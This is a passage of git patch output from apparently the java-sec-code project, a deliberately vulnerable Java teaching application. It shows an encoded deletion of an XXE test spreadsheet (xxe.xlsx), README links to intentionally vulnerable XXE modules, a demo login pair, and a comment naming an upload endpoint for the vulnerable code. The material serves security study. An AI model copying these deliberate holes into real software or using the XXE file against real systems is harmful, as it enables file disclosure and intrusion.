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
CcS!R9

diff --git a/xxe.xlsx b/xxe.xlsx
deleted file mode 100644
index 1146b47842890899263e3f551cdd0805b45fd6c1..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 9049
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


From 27df4d1e605689cf1848c3a79c43ab5891b17e9d Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Thu, 5 Sep 2019 19:26:13 +0800
Subject: [PATCH 060/108] update readme

---
 README.md                                                  | 7 ++++---
 README_zh.md                                               | 6 +++---
 .../java/org/joychou/controller/othervulns/ooxmlXXE.java   | 4 ++--
 src/main/resources/templates/index.html                    | 4 +++-
 4 files changed, 12 insertions(+), 9 deletions(-)

diff --git a/README.md b/README.md
index a594d142..5799c51b 100644
--- a/README.md
+++ b/README.md
@@ -36,6 +36,7 @@ Sort by letter.
 - [IP Forge](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/IPForge.java)
 - [Java RMI](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/RMI/Server.java)
 - [JSONP](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/jsonp/JSONP.java)
+- [ooxmlXXE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/othervulns/ooxmlXXE.java)
 - [PathTraversal](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/PathTraversal.java)
 - [RCE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Rce.java)
 - [SpEL](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SpEL.java)
@@ -44,11 +45,10 @@ Sort by letter.
 - [SSTI](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SSTI.java)
 - [URL Redirect](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/URLRedirect.java)
 - [URL whitelist Bypass](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/URLWhiteList.java)
+- [xlsxStreamerXXE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/othervulns/xlsxStreamerXXE.java)
 - [XSS](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/XSS.java)
 - [XStream](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/XStreamRce.java)
 - [XXE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/XXE.java)
-- [ooxmlXXE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/othervulns/ooxmlXXE.java)
-- [xlsxStreamerXXE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/othervulns/xlsxStreamerXXE.java)
 
 
 
@@ -61,6 +61,7 @@ Sort by letter.
 - [Fastjson](https://github.com/JoyChou93/java-sec-code/wiki/Fastjson)
 - [Java RMI](https://github.com/JoyChou93/java-sec-code/wiki/Java-RMI)
 - [JSONP](https://github.com/JoyChou93/java-sec-code/wiki/JSONP)
+- [POI-OOXML XXE](https://github.com/JoyChou93/java-sec-code/wiki/Poi-ooxml-XXE)
 - [SQLI](https://github.com/JoyChou93/java-sec-code/wiki/SQL-Inject)
 - [SSRF](https://github.com/JoyChou93/java-sec-code/wiki/SSRF)
 - [SSTI](https://github.com/JoyChou93/java-sec-code/wiki/SSTI)
@@ -189,7 +190,7 @@ Tomcat's default JSESSION session is valid for 30 minutes, so a 30-minute non-op
 ## Contributors
 
 Core developers : [JoyChou](https://github.com/JoyChou93).
-Other developers: [lightless](https://github.com/lightless233),  [Anemone95](https://github.com/Anemone95). 
+Other developers: [lightless](https://github.com/lightless233),  [Anemone95](https://github.com/Anemone95), [waderwu](https://github.com/waderwu). 
 
 
 ## Donate
diff --git a/README_zh.md b/README_zh.md
index 62fac015..72477885 100644
--- a/README_zh.md
+++ b/README_zh.md
@@ -32,6 +32,7 @@ joychou/joychou123
 - [IP Forge](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/IPForge.java)
 - [Java RMI](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/RMI/Server.java)
 - [JSONP](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/jsonp/JSONP.java)
+- [ooxmlXXE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/othervulns/ooxmlXXE.java)
 - [PathTraversal](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/PathTraversal.java)
 - [RCE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Rce.java)
 - [SpEL](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SpEL.java)
@@ -40,12 +41,10 @@ joychou/joychou123
 - [SSTI](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SSTI.java)
 - [URL Redirect](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/URLRedirect.java)
 - [URL whitelist Bypass](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/URLWhiteList.java)
+- [xlsxStreamerXXE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/othervulns/xlsxStreamerXXE.java)
 - [XSS](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/XSS.java)
 - [XStream](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/XStreamRce.java)
 - [XXE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/XXE.java)
-- [ooxmlXXE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/othervulns/ooxmlXXE.java)
-- [xlsxStreamerXXE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/othervulns/xlsxStreamerXXE.java)
-
 
 
 ## 漏洞说明
@@ -57,6 +56,7 @@ joychou/joychou123
 - [Fastjson](https://github.com/JoyChou93/java-sec-code/wiki/Fastjson)
 - [Java RMI](https://github.com/JoyChou93/java-sec-code/wiki/Java-RMI)
 - [JSONP](https://github.com/JoyChou93/java-sec-code/wiki/JSONP)
+- [POI-OOXML XXE](https://github.com/JoyChou93/java-sec-code/wiki/Poi-ooxml-XXE)
 - [SQLI](https://github.com/JoyChou93/java-sec-code/wiki/SQL-Inject)
 - [SSRF](https://github.com/JoyChou93/java-sec-code/wiki/SSRF)
 - [SSTI](https://github.com/JoyChou93/java-sec-code/wiki/SSTI)
diff --git a/src/main/java/org/joychou/controller/othervulns/ooxmlXXE.java b/src/main/java/org/joychou/controller/othervulns/ooxmlXXE.java
index 6a17e366..6cefe27f 100644
--- a/src/main/java/org/joychou/controller/othervulns/ooxmlXXE.java
+++ b/src/main/java/org/joychou/controller/othervulns/ooxmlXXE.java
@@ -20,10 +20,10 @@
 
 /**
  * Desc:   poi-ooxml xxe vuln code
- * Usage:  [Content_Type].xml
+ * Usage:  [Content_Type].xml  http://localhost:8080/ooxml/upload
  * Ref:    https://www.itread01.com/hkpcyyp.html
  * Fix:    Update poi-ooxml to 3.15 or above.
